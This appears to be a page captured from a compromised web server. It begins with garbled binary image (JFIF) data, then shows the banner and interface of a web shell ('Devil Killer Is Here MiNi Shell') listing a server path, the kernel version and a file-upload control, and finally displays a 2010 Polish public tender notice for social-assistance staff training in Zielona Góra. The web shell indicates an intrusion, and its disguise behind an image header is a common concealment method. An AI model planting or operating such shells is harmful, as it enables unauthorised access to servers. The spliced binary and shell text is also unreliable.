JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100205/34106-N-2010.html

<p class="kh_header"><b>Zielona Góra: Przeprowadzenie cyklu szkoleń w ramach projektu systemowego 
w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej</b><br>
<b>Numer ogłoszenia: 34106 - 2010; data zamieszczenia: 05.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Marszałkowski Województwa Lubuskiego , ul. Podgórna 7, 65-057 Zielona Góra, woj. lubuskie, tel. 068 4565403, 4565404, 4565277, faks 068 4565404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubuskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie cyklu szkoleń w ramach projektu systemowego 
w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie usługi pn.: Przeprowadzenie cyklu szkoleń w ramach projektu systemowego w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej, który obejmuje zorganizowanie i przeprowadzenie cyklu szkoleń i seminariów podzielonych na 3 moduły tematyczne.
2.	Przedmiot zamówienia realizowany jest w ramach projektu:  Projekt systemowy w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej w województwie lubuskim współfinansowany przez Unie Europejską w ramach Europejskiego Funduszu Społecznego.
3.	Przedmiot zamówienia obejmuje niżej przedstawioną tematykę:

I Moduł: Program Operacyjny Kapitał Ludzki - możliwości współfinansowania projektów socjalnych
a)	szkolenia warsztatowe dla przedstawicieli OPS, ROPS, PCPR dotyczące projektu systemowego planowanie, rozliczanie, sprawozdawczość, monitoring i ewaluacja projektów EFS (ustawy o ochronie danych osobowych, o finansach publicznych, PZP) (2 grupy po 25 osób),
b)	szkolenia warsztatowe dla przedstawicieli OPS, ROPS, PCPR dotyczące projektu systemowego planowanie, rozliczanie, sprawozdawczość, monitoring i ewaluacja projektów EFS (ustawy o ochronie danych osobowych, o finansach publicznych, PZP) (2 grupy po 25 osób),
c)	spotkanie informacyjno - szkoleniowe dla przedstawicieli OPS, ROPS,  PCPR  z zakresu realizacji projektów systemowych współfinansowanych z EFS (1 grupa licząca 50 osób).

II	Moduł:      Praca socjalna i umiejętności interpersonalne
a)	szkolenia dla przedstawicieli ROPS z zakresu umiejętności interpersonalnych oraz zapobieganiu wypaleniu zawodowemu (2 grupy po 20 osób),
b)	warsztaty dla przedstawicieli OPS, ROPS,  PCPR z zakresu pracy socjalnej z rodziną wieloproblemową (2 grupy po 20 osób),
c)	warsztaty dla kadry kierowniczej dla przedstawicieli OPS, PCPR, ROPS, DPŚ, ŚDS itp. z zakresu zarządzania jednostkami pomocy społecznej (2 grupy po 20 osób),
d)	seminaria jednodniowe nt. systemowej pomocy rodzinie oraz budowania instrumentów umożliwiających koordynację działań z zakresu polityki społecznej (2 grupy po 20 osób),
e)	szkolenie z zakresu podniesienia kompetencji wychowawczych i organizacyjnych pracowników placówek opiekuńczo - wychowawczych (1 grupa licząca 25 osób) 

III	Moduł:	 Szkolenia specjalistyczne
a)	warsztaty szkoleniowe dla przedstawicieli OPS, PCPR, ROPS z zakresu - asystent rodzinny (1 grupa licząca 18 osób uczestnicząca w dwóch warsztatach),
b)	warsztaty szkoleniowe dla przedstawicieli OPS, PCPR, ROPS z zakresu - streetworker (1 grupa licząca 18 osób uczestnicząca w dwóch warsztatach),
c)	warsztaty szkoleniowe dla przedstawicieli OPS, PCPR, ROPS z zakresu - Konferencja Grupy Rodzinnej (1 grupa licząca 18 osób uczestnicząca w dwóch warsztatach),
d)	warsztaty szkoleniowe dla przedstawicieli OPS, PCPR, ROPS z zakresu - animator lokalny (1 grupa licząca 18 osób uczestnicząca w dwóch warsztatach).

Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 1.1, 1.2, 1.3, 2.1, 2.2, 2.3, 2.4, 2.5, 3.1, 3.2, 3.3, 3.4 do SIWZ.
4.	Zamawiający przewiduje, że szkolenia lub seminaria objęte trzema modułami obejmować będą około 407 osób.
5.	Wykonawca realizujący moduł  (moduły), stanowiący  (stanowiące) przedmiot zamówienia, zobowiązany jest do: 
1)	Przygotowania uczestnikom szkolenia lub seminarium materiałów szkoleniowych w tym: teczek na materiały szkoleniowe, notes, długopis, prezentację szkolenia w formie papierowej i elektronicznej.
2)	Zapewnienia odpowiedniego sprzętu i warunków lokalowych, sal szkoleniowych, warsztatowych.
3)	Przedstawienia opisu warunków lokalowych ze wskazaniem miejsca szkolenia lub seminarium.
4)	Zapewnienia uczestnikom szkoleń lub seminariów bazy hotelowo - szkoleniowej.
5)	Zapewnienia kadry szkoleniowej.
6)	Zapewnienia transportu uczestnikom szkolenia lub seminarium.
7)	Sprawowania nadzoru nad uczestnikami poszczególnych szkoleń lub seminariów.
8)	Zapewnienia uczestnikom szkolenia lub seminarium ubezpieczenia od następstw nieszczęśliwych wypadków.
9)	Wyposażenia sal szkoleniowych w odpowiedni sprzęt dydaktyczny, a uczestników w materiały szkoleniowe niezbędne do prawidłowej realizacji programu szkolenia.
6.	Wykonawca zobowiązany jest do przedłożenia szczegółowego programu szkoleń lub seminariów, ze wskazaniem formy i metod szkolenia (ćwiczenia, symulacje, itp.) oraz ilością godzin zajęć teoretycznych i praktycznych (z podziałem na część merytoryczną oraz praktyczną).
7.	Wykonawca zobowiązany jest przedłożyć harmonogram zajęć szkoleń lub seminariów.
8.	Zapewnić warunki zgodne z przepisami BHP w trakcie trwania szkolenia lub seminarium.
9.	Szkolenie lub seminarium powinno zakończyć się wydaniem zaświadczenia o jego ukończeniu.
10.	Wydane zaświadczenia muszą być oznakowane logo Europejskiego Funduszu Społecznego i zawierać informację, że projekt był współfinansowany ze środków EFS.
11.	Zamawiający zastrzega sobie prawo dokonywania kontroli realizacji zamówienia, a Wykonawca zobowiązany jest do zapewnienia zakwaterowania (nie dotyczy seminariów), wyżywienia oraz udziału w szkoleniach lub seminariach osobom wskazanym przez Zamawiającego do przeprowadzenia kontroli realizacji przedmiotu zamówienia. Koszty z tego tytułu Wykonawca musi uwzględnić w cenie złożonej oferty.
12.	Wykonawca ma obowiązek dostarczyć pełną dokumentację szkoleń lub seminariów, tj. faktury VAT / rachunki, listy obecności, ankiety ewaluacyjne oraz raport końcowy.
13.	Wykonawca winien zorganizować szkolenie lub seminarium w pełnym zakresie (zapewnić transport z miejsca wyznaczonego przez Zamawiającego na miejsce szkolenia lub seminarium i z powrotem, pełne wyżywienie, a w przypadku szkoleń, również zakwaterowanie) i terminach określonych w rozdziale X SIWZ i załącznikach nr od 1.1 do nr 3.4 do SIWZ.
14.	Wykonawca będzie bezpośrednio odpowiedzialny za przygotowanie, przeprowadzenie i obsługę szkolenia lub seminarium, zapewnienie materiałów oraz pomocy szkoleniowych, zapewnienie trenera szkolenia lub seminarium, osoby będącej kierownikiem oraz koordynatorem szkolenia lub seminarium. Osoba ta musi przebywać (przez okres trwania szkolenia lub seminarium) w miejscu odbywania zajęć w celu zapewnienia prawidłowej organizacji zajęć i powinna dysponować telefonem stacjonarnym lub komórkowym.
15.	Miejscem szkolenia lub seminarium określonego w zał. nr 1.1, 1.2, 1.3, 2.2, 2.3, 2.4, 2.5, 3.1, 3.2, 3.3, 3.4 do SIWZ musi być województwo lubuskie. Szkolenie określone w załączniku nr 2.1 realizowane musi być w miejscowości górskiej na terenie kraju. Miejscowość górska to miejscowość określona w wykazie miejscowości górskich i podgórskich prowadzonym przez sejmiki województwa.
16.	Wykonawca zapewni nocleg podczas trwania szkolenia  wszystkim uczestnikom w hotelu minimum trzy gwiazdkowym lub ośrodku szkoleniowym o porównywalnym standardzie, z pełnym wyżywieniem, w pokojach jedno, dwu lub maksymalnie trzyosobowych z łazienką. Śniadania, obiady i kolacje powinny być podawane w innej sali niż sala wykładowa. W przypadku szkolenia określonego w załączniku nr 2.1 Wykonawca zapewni nocleg w przeddzień przedmiotowego szkolenia.
17.	Wykonawca zapewni salę wykładową do przeprowadzenia szkolenia o wielkości odpowiedniej do ilości osób, o odpowiedniej wizualizacji w miejscu zakwaterowania, wyposażoną w rzutnik do prezentacji multimedialnej, laptopa oraz tablicę. Wykonawca zapewni salę wykładową do przeprowadzenia seminarium o wielkości odpowiedniej do ilości osób, o odpowiedniej wizualizacji, wyposażoną w rzutnik do prezentacji multimedialnej, laptopa oraz tablicę. W czasie przerw kawowych powinny być podawane wyroby cukiernicze, kawa, herbata, soki, woda mineralna, jak również powinien być zapewniony dostęp do łazienek.
18.	Wykonawca zapewni usługi gastronomiczne pełnego wyżywienia (śniadanie pełne - szwedzki stół, obiad z dwóch dań, sałatki, napój i kolacje - szwedzki stół) oraz w formie serwisu kawowego (kawa, herbata, woda mineralna gazowana i niegazowana, soki, ciasta) wszystkich uczestników szkolenia lub seminarium w każdym dniu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.52.20.00-9, 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie zgodnie z art. 22 ust 1 - zgodnie z załącznikiem nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy posiadają odpowiednie doświadczenie zawodowe  polegające na wykonaniu w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbioru usługi oraz załączenie dokumentów potwierdzających, że usługi te zostały wykonane należycie (mogą to być np. referencje, protokoły odbioru, potwierdzenia przyjęcia usługi) i udokumentują, iż wykonali minimum cztery szkolenia, seminaria lub inne formy podnoszenia kwalifikacji w zakresie polityki społecznej o łącznej wartości nie mniejszej niż 100 000,00 zł brutto, z czego przynajmniej jedno szkolenie, seminarium lub inna forma podnoszenia kwalifikacji w zakresie polityki społecznej  zrealizowana była na kwotę co najmniej 50 000,00 zł brutto - zgodnie z załącznikiem nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności w niniejszym postępowaniu. Wykonawca zobowiązany jest dołączyć kserokopie dyplomów, zaświadczeń, posiadanych uprawnień, certyfikatów itp. osób prowadzących szkolenie - zgodnie z załącznikiem nr 7 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) sprawozdanie finansowe lub jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu albo jego części, a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za rok 2009, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. Wykonawca musi wykazać obroty na kwotę nie mniejszą niż - 200 000,00 zł
b) polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości, co najmniej 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanej części sprawozdania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo wprowadzenia zmian do umów stanowiących zał. od 8.1 do 8.3 do SIWZ, w kwestiach , o których mowa w § 4 pkt 5,§ 5 i § 9 
W przypadku, gdy rzeczywista liczba uczestników szkolenia będzie mniejsza od wskazanej w § 2 ust. 5 wynagrodzenie należne Wykonawcy zostanie odpowiednio wyliczone w stosunku do rzeczywistej ilości uczestników warsztatów szkoleniowych i kosztów przypadających na jednego uczestnika wskazanych w ust. 5.
Zamawiający może zrezygnować z usług objętych niniejszą umową, pisemnie za potwierdzeniem, zawiadamiając o tym Wykonawcę faksem lub pocztą elektroniczną. 
W przypadku rezygnacji z usług objętych niniejsza umową co najmniej 3 dni przed planowanym terminem wykonania usługi szkoleniowej, Zamawiający nie ponosi żadnych kosztów i nie będzie zobowiązany do zapłaty żadnych kwot wobec Wykonawcy. W przypadku rezygnacji w późniejszym terminie Zamawiający ponosi wszelkie udokumentowane koszty rezerwacji usług poniesione przez Wykonawcę. 
Zamawiający ma prawo do zmniejszenia o 20 % uczestników warsztatu szkoleniowego, informując o tym Wykonawcę na 3 dni wcześniej przed wykonaniem usługi</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubuskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.lubuskie.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2010 godzina 09:00, miejsce: Ofertę/y należy złożyć w siedzibie Zamawiającego, tj. Urzędzie Marszałkowskim Województwa Lubuskiego w Zielonej Górze, ul. Podgórna 7, Kancelaria Ogólna (parter - pokój nr 56).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu współfinansowanego ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I Moduł: Program Operacyjny Kapitał Ludzki - możliwości współfinansowania projektów socjalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	szkolenia warsztatowe dla przedstawicieli OPS, ROPS, PCPR dotyczące projektu systemowego planowanie, rozliczanie, sprawozdawczość, monitoring i ewaluacja projektów EFS (ustawy o ochronie danych osobowych, o finansach publicznych, PZP) (2 grupy po 25 osób),
b)	szkolenia warsztatowe dla przedstawicieli OPS, ROPS, PCPR dotyczące projektu systemowego planowanie, rozliczanie, sprawozdawczość, monitoring i ewaluacja projektów EFS (ustawy o ochronie danych osobowych, o finansach publicznych, PZP) (2 grupy po 25 osób),
c)	spotkanie informacyjno - szkoleniowe dla przedstawicieli OPS, ROPS,  PCPR  z zakresu realizacji projektów systemowych współfinansowanych z EFS (1 grupa licząca 50 osób)..</p></li>
